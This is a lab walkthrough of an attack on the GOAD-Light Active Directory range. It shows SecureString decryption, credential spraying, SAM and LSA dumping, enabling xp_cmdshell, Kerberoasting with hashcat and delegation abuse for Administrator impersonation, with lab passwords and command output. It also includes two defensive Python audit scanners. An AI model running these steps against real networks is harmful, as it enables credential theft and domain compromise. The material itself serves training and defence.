# The ConvertFrom-SecureString -Key output copied from secret.ps1
$secret = "76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="

# Reverse the export with the same key, then read the SecureString back as plain text
$secure = ConvertTo-SecureString -String $secret -Key $keyData
$ptr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure)

try {
    [Runtime.InteropServices.Marshal]::PtrToStringBSTR($ptr)
}
finally {
    # Zero and free the unmanaged copy of the plaintext
    [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ptr)
}

Output: powerkingftw135

It looks like a password, powerkingftw135, but it is not clear which account it belongs to; the #T.L. at the end of the file may be a hint.
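The two NETLOGON scripts are textbook cases of what a SYSVOL/NETLOGON audit should catch: a literal $password assignment, and an AES key stored in the same file as the SecureString blob it protects (the 76492d1116743f0423413b16050a5345 prefix is the fixed header ConvertFrom-SecureString emits when a -Key is used, which is what makes the blob recognisable on sight). The following Python is an added example, not the page's or GOAD's own tooling: a small scanner over script text that flags both patterns, with the page's script.ps1 and secret.ps1 embedded as sample input. The rule names, the variable-name heuristics and the scan_share helper are my own assumptions.

```python
import re

# Sample inputs: the two NETLOGON scripts as the page shows them, embedded so the
# scanner can be checked against a known-bad sample without touching a share.
SCRIPT_PS1 = r'''# fake script in netlogon with creds
$task = '/c TODO'
$taskName = "fake task"
$user = "NORTH\jeor.mormont"
$password = "_L0ngCl@w_"
# passwords in sysvol still ...
'''

SECRET_PS1 = r'''# cypher script
# $domain="sevenkingdoms.local"
# $EncryptionKeyBytes = New-Object Byte[] 32
# [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes)
# $EncryptionKeyBytes | Out-File "encryption.key"
# $EncryptionKeyData = Get-Content "encryption.key"
# Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath "secret.encrypted"
# secret stored :
$keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91
$secret="76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="
# T.L.
'''

# Fixed header of every ConvertFrom-SecureString export made with -Key / -SecureKey.
SECURESTRING_KEY_HEADER = "76492d1116743f0423413b16050a5345"

# (rule name, regex whose group 1 is the offending value). Lines starting with '#'
# never match because each rule anchors on a '$' variable at line start.
RULES = [
    ("CLEARTEXT_PASSWORD",
     re.compile(r'^\s*\$(?:password|passwd|pass|pwd)\s*=\s*["\']([^"\']+)["\']', re.I | re.M)),
    ("USERNAME",
     re.compile(r'^\s*\$user(?:name)?\s*=\s*["\']([^"\']+)["\']', re.I | re.M)),
    ("SECURESTRING_KEY_EXPORT",
     re.compile(r'(' + SECURESTRING_KEY_HEADER + r'[0-9A-Za-z+/=]+)')),
    # a 16..32 element byte list assigned to a variable with "key" in its name
    ("EMBEDDED_AES_KEY",
     re.compile(r'^\s*\$\w*key\w*\s*=\s*((?:\d{1,3}\s*,\s*){15,31}\d{1,3})\s*$', re.I | re.M)),
]

SCRIPT_EXTS = (".ps1", ".bat", ".cmd", ".vbs")


def scan_script(name, text):
    """Return a list of {file, rule, value} findings for one script body."""
    found = []
    for rule, rx in RULES:
        for m in rx.finditer(text):
            found.append({"file": name, "rule": rule, "value": m.group(1)})
    # Correlation: an encrypted SecureString is only as safe as the key, and a key
    # in the same file means anyone who can read the share can decrypt the blob.
    rules = {f["rule"] for f in found}
    if {"SECURESTRING_KEY_EXPORT", "EMBEDDED_AES_KEY"} <= rules:
        found.append({"file": name, "rule": "KEY_STORED_WITH_CIPHERTEXT",
                      "value": "AES key and ciphertext in one file; rotate the secret and move the key out"})
    return found


def scan_share(files):
    """files: {relative path: content} as pulled from NETLOGON/SYSVOL; scripts only."""
    out = []
    for path, text in files.items():
        if path.lower().endswith(SCRIPT_EXTS):
            out.extend(scan_script(path, text))
    return out


if __name__ == "__main__":
    for f in scan_share({"NETLOGON/script.ps1": SCRIPT_PS1, "NETLOGON/secret.ps1": SECRET_PS1}):
        print(f["file"], f["rule"], f["value"][:40])
```

Run against a real share by walking the files downloaded with smbclient (or a mounted SYSVOL) into the dict that scan_share takes; the same rules also catch cpassword-style leftovers in .bat and .vbs logon scripts, which is why those extensions are included.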

Lateral validation with jeor.mormont

Spray the credentials from script.ps1

SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB 192.168.56.10 445 KINGSLANDING [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_
SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_ (Pwn3d!)

(Pwn3d!) means administrator privileges on 192.168.56.22

Credential extraction after local admin

nxc smb 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u 'jeor.mormont' -p '_L0ngCl@w_' \
  --loggedon-users

List the currently logged-on users

SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_ (Pwn3d!)
SMB 192.168.56.22 445 CASTELBLACK NORTH\CASTELBLACK$ logon_server:
SMB 192.168.56.22 445 CASTELBLACK NORTH\robb.stark logon_server: WINTERFELL
SMB 192.168.56.22 445 CASTELBLACK NORTH\sql_svc logon_server: WINTERFELL

robb.stark and sql_svc are logged on

Enumerate domain users and look for candidate usernames matching the #T.L. hint.

A samwell.tarly / Heartsbane pair also leaks here; note it for later verification and lateral enumeration.

nxc smb 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u 'jeor.mormont' -p '_L0ngCl@w_' \
  --sam

Dump the SAM database of 192.168.56.22

nxc smb 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u 'jeor.mormont' -p '_L0ngCl@w_' \
  --lsa

Dump the LSA secrets of 192.168.56.22, which may contain plaintext credentials

This exposes the password of the database service account sql_svc in the north.sevenkingdoms.local domain: YouWillNotKerboroast1ngMeeeeee.

MSSQL and the sql_svc service account

First verify its access over SMB on the three hosts:

nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u 'sql_svc' -p 'YouWillNotKerboroast1ngMeeeeee'

Then test the MSSQL login:

nxc mssql 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u 'sql_svc' -p 'YouWillNotKerboroast1ngMeeeeee'

Next, check its permissions inside SQL Server:

nxc mssql 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u 'sql_svc' -p 'YouWillNotKerboroast1ngMeeeeee' \
  -q "SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin');"

The last column of SELECT @@SERVERNAME, SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin');

comes back as 1, so sql_svc is a SQL Server sysadmin

Next, enable and test xp_cmdshell:

nxc mssql 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u 'sql_svc' -p 'YouWillNotKerboroast1ngMeeeeee' \
  -q "EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;"

Then run a system command to confirm which identity SQL executes commands as:

nxc mssql 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u 'sql_svc' -p 'YouWillNotKerboroast1ngMeeeeee' \
  -x 'whoami && hostname'

Then check its privileges:

nxc mssql 192.168.56.22 \
  -d north.sevenkingdoms.local \
  -u 'sql_svc' -p 'YouWillNotKerboroast1ngMeeeeee' \
  -x 'whoami /priv'

When running system commands through xp_cmdshell, the current identity is north\sql_svc, and that account holds SeImpersonatePrivilege.

Landing parent-domain credentials and BloodHound

Note that the parent domain has two candidate users matching the #T.L. hint in secret.ps1: tywin.lannister and tyron.lannister.

Try both

nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \
  -d sevenkingdoms.local \
  -u 'tywin.lannister' -p 'powerkingftw135'

nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \
  -d sevenkingdoms.local \
  -u 'tyron.lannister' -p 'powerkingftw135'

tywin.lannister works, and it can log on to .10, .11 and .22

First import the sevenkingdoms.local zip into BloodHound Legacy, then focus on these queries:

bloodhound-python \
  -u 'jeor.mormont' -p '_L0ngCl@w_' \
  -d 'north.sevenkingdoms.local' -ns 192.168.56.11 \
  -c All --zip

Kerberoasting and delegation abuse

Kerberoasting

Use a domain account we already hold to ask the DC for service accounts with SPNs and pull their Kerberos service tickets, to be cracked offline later.

impacket-GetUserSPNs sevenkingdoms.local/tywin.lannister:powerkingftw135 \
  -dc-ip 192.168.56.10 -request

The child domain is the same:

impacket-GetUserSPNs north.sevenkingdoms.local/jeor.mormont:_L0ngCl@w_ \
  -dc-ip 192.168.56.11 -request

The parent domain has no usable SPN accounts; the child domain yields sansa.stark, jon.snow and sql_svc, with three hashes.

sql_svc's password is already known, so there is no need to crack it; save the two $krb5tgs$23$… hashes for sansa.stark and jon.snow to a file and run hashcat on them.

hashcat -m 13100 hashpatch.txt /usr/share/wordlists/rockyou.txt

hashcat finally recovers jon.snow's password: iknownothing.

Delegation abuse and stage conclusion

Verify the new credentials

impacket-findDelegation north.sevenkingdoms.local/jon.snow:iknownothing \
  -dc-ip 192.168.56.11

This checks which services jon.snow is allowed to access "on behalf of" someone else.

impacket-getST -spn cifs/winterfell.north.sevenkingdoms.local \
  -impersonate Administrator \
  north.sevenkingdoms.local/jon.snow:iknownothing \
  -dc-ip 192.168.56.11

jon.snow has Constrained w/ Protocol Transition

It is allowed to delegate to CIFS/winterfell.north.sevenkingdoms.local

In the second command, getST:

This shows we have successfully obtained a service ticket as Administrator for CIFS/winterfell.north.sevenkingdoms.local.

More precisely, this step proves that a high-privilege path inside the north.sevenkingdoms.local child domain is open.

The official documentation does not explicitly state that this step equals control of the parent domain or the whole forest, so this GOAD-Light walkthrough stops here.
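The Kerberoasting and delegation findings above come down to a few attributes on the account object: servicePrincipalName on an enabled user account, and the userAccountControl delegation bits together with msDS-AllowedToDelegateTo. The following Python is an added example, not the page's or impacket's code: an audit over a constructed list of account records that classifies each account the way a defender would before anyone runs GetUserSPNs or findDelegation. The attribute names are the real LDAP ones and the flag values are Microsoft's published userAccountControl bits; the SPN strings, the old_svc account and the exact flag combinations are illustrative, not GOAD's data. Wiring it to a live directory (for example via ldap3) is left out so the block runs offline.

```python
# userAccountControl flag bits as documented by Microsoft (MS-SAMR / MS-ADTS).
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000
TRUSTED_FOR_DELEGATION = 0x80000
DONT_REQ_PREAUTH = 0x400000
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000

# Constructed sample records, shaped like the result of an LDAP query for
# sAMAccountName, userAccountControl, servicePrincipalName and
# msDS-AllowedToDelegateTo. Account names follow the walkthrough; the SPN
# values, old_svc and the flag combinations are illustrative only.
ACCOUNTS = [
    {"sAMAccountName": "sql_svc", "userAccountControl": NORMAL_ACCOUNT,
     "servicePrincipalName": ["MSSQLSvc/example-sql.north.sevenkingdoms.local:1433"],
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "jon.snow",
     "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "servicePrincipalName": ["HTTP/example-web.north.sevenkingdoms.local"],
     "msDS-AllowedToDelegateTo": ["CIFS/winterfell.north.sevenkingdoms.local"]},
    {"sAMAccountName": "arya.stark", "userAccountControl": NORMAL_ACCOUNT,
     "servicePrincipalName": [], "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "old_svc", "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE,
     "servicePrincipalName": ["HTTP/example-old.north.sevenkingdoms.local"],
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "krbtgt", "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE,
     "servicePrincipalName": ["kadmin/changepw"], "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "WINTERFELL$",
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "servicePrincipalName": ["HOST/winterfell.north.sevenkingdoms.local"],
     "msDS-AllowedToDelegateTo": []},
]


def is_machine(acct):
    return bool(acct["userAccountControl"] & (WORKSTATION_TRUST_ACCOUNT | SERVER_TRUST_ACCOUNT))


def is_kerberoastable(acct):
    """Enabled user (not computer) account with at least one SPN; krbtgt is excluded."""
    uac = acct["userAccountControl"]
    return (not is_machine(acct)
            and not uac & ACCOUNTDISABLE
            and acct["sAMAccountName"].lower() != "krbtgt"
            and bool(acct.get("servicePrincipalName")))


def delegation_kind(acct):
    """'unconstrained', 'constrained_protocol_transition', 'constrained' or None."""
    uac = acct["userAccountControl"]
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if acct.get("msDS-AllowedToDelegateTo"):
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained_protocol_transition"
        return "constrained"
    return None


def audit(accounts):
    """Return (account, code, remediation) tuples; domain controllers are exempt from the unconstrained check."""
    report = []
    for a in accounts:
        name, uac = a["sAMAccountName"], a["userAccountControl"]
        if is_kerberoastable(a):
            report.append((name, "KERBEROASTABLE",
                           "user account with SPN: move it to a gMSA or a long random password, AES-only"))
        if not is_machine(a) and uac & DONT_REQ_PREAUTH:
            report.append((name, "ASREP_ROASTABLE", "re-enable Kerberos pre-authentication"))
        kind = delegation_kind(a)
        if kind == "unconstrained" and not uac & SERVER_TRUST_ACCOUNT:
            report.append((name, "UNCONSTRAINED_DELEGATION", "replace with resource-based constrained delegation"))
        elif kind == "constrained_protocol_transition":
            targets = ", ".join(a["msDS-AllowedToDelegateTo"])
            report.append((name, "CONSTRAINED_DELEGATION_PROTOCOL_TRANSITION",
                           "can request tickets as any non-protected user to " + targets
                           + "; clear TRUSTED_TO_AUTH_FOR_DELEGATION and put admins in Protected Users"))
        elif kind == "constrained":
            report.append((name, "CONSTRAINED_DELEGATION", "review the allowed target SPNs"))
    return report


if __name__ == "__main__":
    for name, code, fix in audit(ACCOUNTS):
        print(f"{name:12} {code:42} {fix}")
```

The two findings the walkthrough exploited, sql_svc and jon.snow being Kerberoastable and jon.snow holding constrained delegation with protocol transition to CIFS on the DC, both show up in the report, while the DC's own unconstrained delegation (normal for a domain controller) and the disabled krbtgt are deliberately left out.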
